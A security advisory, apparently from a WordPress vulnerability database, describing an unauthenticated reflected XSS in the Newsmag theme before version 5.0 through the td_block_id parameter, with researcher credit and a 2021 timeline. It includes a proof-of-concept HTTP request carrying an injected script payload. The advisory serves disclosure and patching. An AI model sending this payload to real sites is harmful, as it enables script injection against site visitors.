Newsmag < 5.0 - Unauthenticated Reflected Cross-site Scripting (XSS)
Description
The theme does not sanitise the td_block_id parameter in its td_ajax_block AJAX action, leading to an unauthenticated Reflected Cross-site Scripting (XSS) vulnerability. Due to a nonce check, this issue is only exploitable on unauthenticated users (for as long as the nonce used in the request is valid)
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 136 Connection: close action=td_ajax_block&td_block_id="><img+src+onerror=alert(document.domain)>&block_type=td_block_related_posts&td_magic_token=59c7ec0654
Affects Themes
Fixed in version 5.0✓
References
Classification
Miscellaneous
Original Researcher
Truoc Phan
Submitter
Truoc Phan
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-07-12 (about 3 months ago)
Added
2021-07-12 (about 3 months ago)
Last Updated
2021-07-12 (about 3 months ago)